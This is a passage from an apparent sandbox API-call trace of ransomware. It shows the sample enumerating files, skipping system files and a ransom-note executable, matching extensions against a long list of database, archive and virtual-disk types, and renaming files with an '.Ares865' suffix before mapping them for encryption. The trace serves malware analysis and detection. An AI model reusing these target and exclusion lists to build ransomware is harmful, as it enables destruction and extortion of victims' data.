lpString2="te") returned -1 [0089.428] lstrlenW (lpString="teacher") returned 7 [0089.428] lstrcmpiW (lpString1="ngs.ico", lpString2="teacher") returned -1 [0089.428] lstrlenW (lpString="tmd") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0089.428] lstrlenW (lpString="tps") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0089.428] lstrlenW (lpString="trc") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.428] lstrlenW (lpString="trc") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.428] lstrlenW (lpString="trm") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0089.428] lstrlenW (lpString="udb") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0089.428] lstrlenW (lpString="udl") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0089.428] lstrlenW (lpString="usr") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0089.428] lstrlenW (lpString="v12") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0089.428] lstrlenW (lpString="vis") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0089.428] lstrlenW (lpString="vpd") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0089.428] lstrlenW (lpString="vvv") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0089.428] lstrlenW (lpString="wdb") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0089.428] lstrlenW (lpString="wmdb") returned 4 [0089.428] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0089.428] lstrlenW (lpString="wrk") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0089.428] lstrlenW (lpString="xdb") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0089.428] lstrlenW (lpString="xld") returned 3 [0089.428] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0089.428] lstrlenW (lpString="xmlff") returned 5 [0089.429] lstrcmpiW (lpString1="s.ico", lpString2="xmlff") returned -1 [0089.429] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.Ares865") returned 106 [0089.429] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.ares865"), dwFlags=0x1) returned 1 [0089.430] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.430] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67664) returned 1 [0089.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.430] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.430] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.431] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.431] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.431] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10b50, lpName=0x0) returned 0x15c [0089.437] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b50) returned 0x190000 [0089.441] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.442] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.442] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.442] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.442] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.442] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.442] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.443] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.443] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.443] CloseHandle (hObject=0x15c) returned 1 [0089.443] CloseHandle (hObject=0x118) returned 1 [0089.443] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.443] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.443] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.444] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d3e0b7, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d3e0b7, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xc04b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sync.ico", cAlternateFileName="")) returned 1 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2="aoldtz.exe") returned 1 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2=".") returned 1 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2="..") returned 1 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2="windows") returned -1 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2="bootmgr") returned 1 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2="temp") returned -1 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2="pagefile.sys") returned 1 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2="boot") returned 1 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2="ids.txt") returned 1 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2="ntuser.dat") returned 1 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2="perflogs") returned 1 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2="MSBuild") returned 1 [0089.444] lstrlenW (lpString="sync.ico") returned 8 [0089.444] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 98 [0089.444] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="sync.ico" | out: lpString1="sync.ico") returned="sync.ico" [0089.444] lstrlenW (lpString="sync.ico") returned 8 [0089.444] lstrlenW (lpString="Ares865") returned 7 [0089.444] lstrcmpiW (lpString1="ync.ico", lpString2="Ares865") returned 1 [0089.444] lstrlenW (lpString=".dll") returned 4 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2=".dll") returned 1 [0089.444] lstrlenW (lpString=".lnk") returned 4 [0089.444] lstrcmpiW (lpString1="sync.ico", lpString2=".lnk") returned 1 [0089.445] lstrlenW (lpString=".ini") returned 4 [0089.445] lstrcmpiW (lpString1="sync.ico", lpString2=".ini") returned 1 [0089.445] lstrlenW (lpString=".sys") returned 4 [0089.445] lstrcmpiW (lpString1="sync.ico", lpString2=".sys") returned 1 [0089.445] lstrlenW (lpString="sync.ico") returned 8 [0089.445] lstrlenW (lpString="bak") returned 3 [0089.445] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0089.445] lstrlenW (lpString="ba_") returned 3 [0089.445] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0089.445] lstrlenW (lpString="dbb") returned 3 [0089.445] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0089.445] lstrlenW (lpString="vmdk") returned 4 [0089.445] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0089.445] lstrlenW (lpString="rar") returned 3 [0089.445] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0089.445] lstrlenW (lpString="zip") returned 3 [0089.445] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0089.445] lstrlenW (lpString="tgz") returned 3 [0089.445] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0089.445] lstrlenW (lpString="vbox") returned 4 [0089.445] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0089.445] lstrlenW (lpString="vdi") returned 3 [0089.445] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0089.445] lstrlenW (lpString="vhd") returned 3 [0089.445] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0089.445] lstrlenW (lpString="vhdx") returned 4 [0089.445] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0089.445] lstrlenW (lpString="avhd") returned 4 [0089.445] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0089.445] lstrlenW (lpString="db") returned 2 [0089.445] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0089.445] lstrlenW (lpString="db2") returned 3 [0089.445] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0089.445] lstrlenW (lpString="db3") returned 3 [0089.445] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0089.445] lstrlenW (lpString="dbf") returned 3 [0089.445] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0089.445] lstrlenW (lpString="mdf") returned 3 [0089.445] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0089.446] lstrlenW (lpString="mdb") returned 3 [0089.446] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0089.446] lstrlenW (lpString="sql") returned 3 [0089.446] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0089.446] lstrlenW (lpString="sqlite") returned 6 [0089.446] lstrcmpiW (lpString1="nc.ico", lpString2="sqlite") returned -1 [0089.446] lstrlenW (lpString="sqlite3") returned 7 [0089.446] lstrcmpiW (lpString1="ync.ico", lpString2="sqlite3") returned 1 [0089.446] lstrlenW (lpString="sqlitedb") returned 8 [0089.446] lstrlenW (lpString="xml") returned 3 [0089.446] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0089.446] lstrlenW (lpString="$er") returned 3 [0089.446] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0089.446] lstrlenW (lpString="4dd") returned 3 [0089.446] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0089.446] lstrlenW (lpString="4dl") returned 3 [0089.446] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0089.446] lstrlenW (lpString="^^^") returned 3 [0089.446] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0089.446] lstrlenW (lpString="abs") returned 3 [0089.446] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0089.446] lstrlenW (lpString="abx") returned 3 [0089.446] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0089.446] lstrlenW (lpString="accdb") returned 5 [0089.446] lstrcmpiW (lpString1="c.ico", lpString2="accdb") returned 1 [0089.446] lstrlenW (lpString="accdc") returned 5 [0089.446] lstrcmpiW (lpString1="c.ico", lpString2="accdc") returned 1 [0089.446] lstrlenW (lpString="accde") returned 5 [0089.446] lstrcmpiW (lpString1="c.ico", lpString2="accde") returned 1 [0089.446] lstrlenW (lpString="accdr") returned 5 [0089.446] lstrcmpiW (lpString1="c.ico", lpString2="accdr") returned 1 [0089.446] lstrlenW (lpString="accdt") returned 5 [0089.446] lstrcmpiW (lpString1="c.ico", lpString2="accdt") returned 1 [0089.446] lstrlenW (lpString="accdw") returned 5 [0089.446] lstrcmpiW (lpString1="c.ico", lpString2="accdw") returned 1 [0089.446] lstrlenW (lpString="accft") returned 5 [0089.446] lstrcmpiW (lpString1="c.ico", lpString2="accft") returned 1 [0089.446] lstrlenW (lpString="adb") returned 3 [0089.446] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.447] lstrlenW (lpString="adb") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.447] lstrlenW (lpString="ade") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0089.447] lstrlenW (lpString="adf") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0089.447] lstrlenW (lpString="adn") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0089.447] lstrlenW (lpString="adp") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0089.447] lstrlenW (lpString="alf") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0089.447] lstrlenW (lpString="ask") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0089.447] lstrlenW (lpString="btr") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0089.447] lstrlenW (lpString="cat") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0089.447] lstrlenW (lpString="cdb") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0089.447] lstrlenW (lpString="ckp") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0089.447] lstrlenW (lpString="cma") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0089.447] lstrlenW (lpString="cpd") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0089.447] lstrlenW (lpString="dacpac") returned 6 [0089.447] lstrcmpiW (lpString1="nc.ico", lpString2="dacpac") returned 1 [0089.447] lstrlenW (lpString="dad") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0089.447] lstrlenW (lpString="dadiagrams") returned 10 [0089.447] lstrlenW (lpString="daschema") returned 8 [0089.447] lstrlenW (lpString="db-journal") returned 10 [0089.447] lstrlenW (lpString="db-shm") returned 6 [0089.447] lstrcmpiW (lpString1="nc.ico", lpString2="db-shm") returned 1 [0089.447] lstrlenW (lpString="db-wal") returned 6 [0089.447] lstrcmpiW (lpString1="nc.ico", lpString2="db-wal") returned 1 [0089.447] lstrlenW (lpString="dbc") returned 3 [0089.447] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0089.448] lstrlenW (lpString="dbs") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0089.448] lstrlenW (lpString="dbt") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0089.448] lstrlenW (lpString="dbv") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0089.448] lstrlenW (lpString="dbx") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0089.448] lstrlenW (lpString="dcb") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0089.448] lstrlenW (lpString="dct") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0089.448] lstrlenW (lpString="dcx") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0089.448] lstrlenW (lpString="ddl") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0089.448] lstrlenW (lpString="dlis") returned 4 [0089.448] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0089.448] lstrlenW (lpString="dp1") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0089.448] lstrlenW (lpString="dqy") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0089.448] lstrlenW (lpString="dsk") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0089.448] lstrlenW (lpString="dsn") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0089.448] lstrlenW (lpString="dtsx") returned 4 [0089.448] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0089.448] lstrlenW (lpString="dxl") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0089.448] lstrlenW (lpString="eco") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0089.448] lstrlenW (lpString="ecx") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0089.448] lstrlenW (lpString="edb") returned 3 [0089.448] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0089.448] lstrlenW (lpString="epim") returned 4 [0089.448] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0089.448] lstrlenW (lpString="fcd") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0089.449] lstrlenW (lpString="fdb") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0089.449] lstrlenW (lpString="fic") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0089.449] lstrlenW (lpString="flexolibrary") returned 12 [0089.449] lstrlenW (lpString="fm5") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0089.449] lstrlenW (lpString="fmp") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0089.449] lstrlenW (lpString="fmp12") returned 5 [0089.449] lstrcmpiW (lpString1="c.ico", lpString2="fmp12") returned -1 [0089.449] lstrlenW (lpString="fmpsl") returned 5 [0089.449] lstrcmpiW (lpString1="c.ico", lpString2="fmpsl") returned -1 [0089.449] lstrlenW (lpString="fol") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0089.449] lstrlenW (lpString="fp3") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0089.449] lstrlenW (lpString="fp4") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0089.449] lstrlenW (lpString="fp5") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0089.449] lstrlenW (lpString="fp7") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0089.449] lstrlenW (lpString="fpt") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0089.449] lstrlenW (lpString="frm") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0089.449] lstrlenW (lpString="gdb") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.449] lstrlenW (lpString="gdb") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.449] lstrlenW (lpString="grdb") returned 4 [0089.449] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0089.449] lstrlenW (lpString="gwi") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0089.449] lstrlenW (lpString="hdb") returned 3 [0089.449] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0089.449] lstrlenW (lpString="his") returned 3 [0089.450] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0089.450] lstrlenW (lpString="ib") returned 2 [0089.450] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0089.450] lstrlenW (lpString="idb") returned 3 [0089.450] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0089.450] lstrlenW (lpString="ihx") returned 3 [0089.450] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0089.450] lstrlenW (lpString="itdb") returned 4 [0089.450] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0089.450] lstrlenW (lpString="itw") returned 3 [0089.450] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0089.450] lstrlenW (lpString="jet") returned 3 [0089.450] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0089.450] lstrlenW (lpString="jtx") returned 3 [0089.450] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0089.450] lstrlenW (lpString="kdb") returned 3 [0089.450] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0089.450] lstrlenW (lpString="kexi") returned 4 [0089.450] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0089.450] lstrlenW (lpString="kexic") returned 5 [0089.450] lstrcmpiW (lpString1="c.ico", lpString2="kexic") returned -1 [0089.450] lstrlenW (lpString="kexis") returned 5 [0089.450] lstrcmpiW (lpString1="c.ico", lpString2="kexis") returned -1 [0089.450] lstrlenW (lpString="lgc") returned 3 [0089.450] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0089.450] lstrlenW (lpString="lwx") returned 3 [0089.450] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0089.450] lstrlenW (lpString="maf") returned 3 [0089.450] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0089.450] lstrlenW (lpString="maq") returned 3 [0089.450] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0089.450] lstrlenW (lpString="mar") returned 3 [0089.450] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0089.450] lstrlenW (lpString="marshal") returned 7 [0089.450] lstrcmpiW (lpString1="ync.ico", lpString2="marshal") returned 1 [0089.450] lstrlenW (lpString="mas") returned 3 [0089.450] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0089.450] lstrlenW (lpString="mav") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0089.451] lstrlenW (lpString="maw") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0089.451] lstrlenW (lpString="mdbhtml") returned 7 [0089.451] lstrcmpiW (lpString1="ync.ico", lpString2="mdbhtml") returned 1 [0089.451] lstrlenW (lpString="mdn") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0089.451] lstrlenW (lpString="mdt") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0089.451] lstrlenW (lpString="mfd") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0089.451] lstrlenW (lpString="mpd") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0089.451] lstrlenW (lpString="mrg") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0089.451] lstrlenW (lpString="mud") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0089.451] lstrlenW (lpString="mwb") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0089.451] lstrlenW (lpString="myd") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0089.451] lstrlenW (lpString="ndf") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0089.451] lstrlenW (lpString="nnt") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0089.451] lstrlenW (lpString="nrmlib") returned 6 [0089.451] lstrcmpiW (lpString1="nc.ico", lpString2="nrmlib") returned -1 [0089.451] lstrlenW (lpString="ns2") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0089.451] lstrlenW (lpString="ns3") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0089.451] lstrlenW (lpString="ns4") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0089.451] lstrlenW (lpString="nsf") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0089.451] lstrlenW (lpString="nv") returned 2 [0089.451] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0089.451] lstrlenW (lpString="nv2") returned 3 [0089.451] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0089.452] lstrlenW (lpString="nwdb") returned 4 [0089.452] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0089.452] lstrlenW (lpString="nyf") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0089.452] lstrlenW (lpString="odb") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.452] lstrlenW (lpString="odb") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.452] lstrlenW (lpString="oqy") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0089.452] lstrlenW (lpString="ora") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0089.452] lstrlenW (lpString="orx") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0089.452] lstrlenW (lpString="owc") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0089.452] lstrlenW (lpString="p96") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0089.452] lstrlenW (lpString="p97") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0089.452] lstrlenW (lpString="pan") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0089.452] lstrlenW (lpString="pdb") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0089.452] lstrlenW (lpString="pdm") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0089.452] lstrlenW (lpString="pnz") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0089.452] lstrlenW (lpString="qry") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0089.452] lstrlenW (lpString="qvd") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0089.452] lstrlenW (lpString="rbf") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0089.452] lstrlenW (lpString="rctd") returned 4 [0089.452] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0089.452] lstrlenW (lpString="rod") returned 3 [0089.452] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0089.452] lstrlenW (lpString="rodx") returned 4 [0089.453] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0089.453] lstrlenW (lpString="rpd") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0089.453] lstrlenW (lpString="rsd") returned 3 [0089.453] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0089.453] lstrlenW (lpString="sas7bdat") returned 8 [0089.453] lstrlenW (lpString="sbf") returned 3 [0089.453] lstrcmpiW 